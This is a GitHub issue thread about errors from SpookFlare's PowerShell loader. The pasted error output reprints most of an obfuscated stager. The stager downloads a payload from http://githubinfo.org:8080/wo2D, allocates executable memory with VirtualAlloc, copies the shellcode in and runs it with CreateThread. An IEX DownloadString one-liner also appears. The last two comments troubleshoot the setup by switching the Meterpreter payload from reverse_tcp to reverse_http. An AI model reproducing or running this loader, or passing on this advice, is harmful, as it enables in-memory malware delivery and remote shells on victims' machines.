### ISSUE TITLE
Error : Powershell and cs loader

### ISSUE THREAD

**Issue by devset7** [hlldz/SpookFlare#10]
Hi, 
I tried to generate the loader using option 2 powershell and cs loader, I compiled using csc but its gave me this error:

> Exception

 calling "DownloadData" with "1" argument(s): "The server committed a protocol violation.
Section=ResponseStatusLine"
At E:\a.ps1:6 char:258
+ ... ,en;q=0.5");[Byte[]] $SXBQYrXFaTja = $MBmARZhcoqfe."D`o`wn`l`oa`d`Dat ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException

Exception calling "Copy" with "5" argument(s): "Value cannot be null.
Parameter name: source"
At E:\a.ps1:6 char:413
+ ... Length - 0);[Array]::Copy($SXBQYrXFaTja, 0, $nUUuHCSJJEek, 0, ($SXBQY ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentNullException

Exception calling "Copy" with "4" argument(s): "Value cannot be null.
Parameter name: destination"
At E:\a.ps1:6 char:691
+ ... x3000,0x40);[Runtime.InteropServices.Marshal]::Copy($nUUuHCSJJEek, 0, ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : ArgumentNullException

>

**Comment by ChrisEvans0** [comment]
I have the same error.I am very confused.please help me.
C:\Users\office\Desktop\spoolflare>powershell.exe -exec bypass -Command "IEX (Ne
w-Object Net.WebClient).DownloadString('http://xxx/test.txt')"
Exception calling "DownloadData" with "1" argument(s): "The remote server retur
ned an error: (404) Not Found."
At line:6 char:317
+ $XTuDvcPyNLbl = New-Object "`N`et.`W`ebc`l`i`ent";$XTuDvcPyNLbl.Headers.Add("
User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");$XTuD
vcPyNLbl.Headers.Add("Accept", "*/*");$XTuDvcPyNLbl.Headers.Add("Accept-Languag
e", "en-gb,en;q=0.5");[Byte[]] $BXFIePSXxRyA = $XTuDvcPyNLbl."D`o`wn`l`oa`d`Dat
a" <<<< ("http://githubinfo.org:8080/wo2D");$tLmGVibSYCqN = New-Object byte[] (
$BXFIePSXxRyA.Length - 61337);[Array]::Copy($BXFIePSXxRyA, 61337, $tLmGVibSYCqN
, 0, ($BXFIePSXxRyA.Length - 61337));$VtpGSRqJeFwj = A`d`d-T`y`p`e -memberDefin
ition $LBmPhrbalGhu -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru
;$adlOEXOopBza=$VtpGSRqJeFwj::VirtualAlloc(0,$tLmGVibSYCqN.Length,0x3000,0x40);
[Runtime.InteropServices.Marshal]::Copy($tLmGVibSYCqN, 0, [IntPtr]($adlOEXOopBz
a.ToInt64()), $tLmGVibSYCqN.Length);$VtpGSRqJeFwj::CreateThread(0,0,$adlOEXOopB
za,0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

New-Object : Exception calling ".ctor" with "1" argument(s): "Arithmetic operat
ion resulted in an overflow."
At line:6 char:379
+ $XTuDvcPyNLbl = New-Object "`N`et.`W`ebc`l`i`ent";$XTuDvcPyNLbl.Headers.Add("
User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");$XTuD
vcPyNLbl.Headers.Add("Accept", "*/*");$XTuDvcPyNLbl.Headers.Add("Accept-Languag
e", "en-gb,en;q=0.5");[Byte[]] $BXFIePSXxRyA = $XTuDvcPyNLbl."D`o`wn`l`oa`d`Dat
a"("http://githubinfo.org:8080/wo2D");$tLmGVibSYCqN = New-Object <<<<  byte[] (
$BXFIePSXxRyA.Length - 61337);[Array]::Copy($BXFIePSXxRyA, 61337, $tLmGVibSYCqN
, 0, ($BXFIePSXxRyA.Length - 61337));$VtpGSRqJeFwj = A`d`d-T`y`p`e -memberDefin
ition $LBmPhrbalGhu -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru
;$adlOEXOopBza=$VtpGSRqJeFwj::VirtualAlloc(0,$tLmGVibSYCqN.Length,0x3000,0x40);
[Runtime.InteropServices.Marshal]::Copy($tLmGVibSYCqN, 0, [IntPtr]($adlOEXOopBz
a.ToInt64()), $tLmGVibSYCqN.Length);$VtpGSRqJeFwj::CreateThread(0,0,$adlOEXOopB
za,0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0
    + CategoryInfo          : InvalidOperation: (:) [New-Object], MethodInvoca
   tionException
    + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.Power
   Shell.Commands.NewObjectCommand

Exception calling "Copy" with "5" argument(s): "Value cannot be null.
Parameter name: source"
At line:6 char:431
+ $XTuDvcPyNLbl = New-Object "`N`et.`W`ebc`l`i`ent";$XTuDvcPyNLbl.Headers.Add("
User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");$XTuD
vcPyNLbl.Headers.Add("Accept", "*/*");$XTuDvcPyNLbl.Headers.Add("Accept-Languag
e", "en-gb,en;q=0.5");[Byte[]] $BXFIePSXxRyA = $XTuDvcPyNLbl."D`o`wn`l`oa`d`Dat
a"("http://githubinfo.org:8080/wo2D");$tLmGVibSYCqN = New-Object byte[] ($BXFIe
PSXxRyA.Length - 61337);[Array]::Copy <<<< ($BXFIePSXxRyA, 61337, $tLmGVibSYCqN
, 0, ($BXFIePSXxRyA.Length - 61337));$VtpGSRqJeFwj = A`d`d-T`y`p`e -memberDefin
ition $LBmPhrbalGhu -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru
;$adlOEXOopBza=$VtpGSRqJeFwj::VirtualAlloc(0,$tLmGVibSYCqN.Length,0x3000,0x40);
[Runtime.InteropServices.Marshal]::Copy($tLmGVibSYCqN, 0, [IntPtr]($adlOEXOopBz
a.ToInt64()), $tLmGVibSYCqN.Length);$VtpGSRqJeFwj::CreateThread(0,0,$adlOEXOopB
za,0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

Multiple ambiguous overloads found for "Copy" and the argument count: "4".
At line:6 char:743
+ $XTuDvcPyNLbl = New-Object "`N`et.`W`ebc`l`i`ent";$XTuDvcPyNLbl.Headers.Add("
User-Agent", "Mozilla/5.0 (compatible; MSIE 11.0; Trident/7.0; rv:11.0)");$XTuD
vcPyNLbl.Headers.Add("Accept", "*/*");$XTuDvcPyNLbl.Headers.Add("Accept-Languag
e", "en-gb,en;q=0.5");[Byte[]] $BXFIePSXxRyA = $XTuDvcPyNLbl."D`o`wn`l`oa`d`Dat
a"("http://githubinfo.org:8080/wo2D");$tLmGVibSYCqN = New-Object byte[] ($BXFIe
PSXxRyA.Length - 61337);[Array]::Copy($BXFIePSXxRyA, 61337, $tLmGVibSYCqN, 0, (
$BXFIePSXxRyA.Length - 61337));$VtpGSRqJeFwj = A`d`d-T`y`p`e -memberDefinition
$LBmPhrbalGhu -Name "Win32" -namespace `W`in`3`2`F`un`ct`i`on`s -passthru;$adlO
EXOopBza=$VtpGSRqJeFwj::VirtualAlloc(0,$tLmGVibSYCqN.Length,0x3000,0x40);[Runti
me.InteropServices.Marshal]::Copy <<<< ($tLmGVibSYCqN, 0, [IntPtr]($adlOEXOopBz
a.ToInt64()), $tLmGVibSYCqN.Length);$VtpGSRqJeFwj::CreateThread(0,0,$adlOEXOopB
za,0,0,0) | oUT-NuLl;`S`T`A`R`T-`S`l`e`E`p -s `8`6`4`2`0
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodCountCouldNotFindBest

**Comment by hlldz** [comment]
Hi @devset7 and @ChrisEvans0,

Could you share your listener settings?

**Comment by sn0b4ll** [comment]
Hi @hlldz @devset7 @ChrisEvans0 ,
I got the same error when trying to connect with the 1st-stage to Multihandler with the payload set to windows/meterpreter/reverse_tcp. Switching the payload to windows/meterpreter/reverse_http fixed it for me.

Greetings,
Dominik

**Comment by hlldz** [comment]
Hi,
Yes, you need to use reverse_http or reverse_https payloads. SpookFlare does not support reverse_tcp payload.
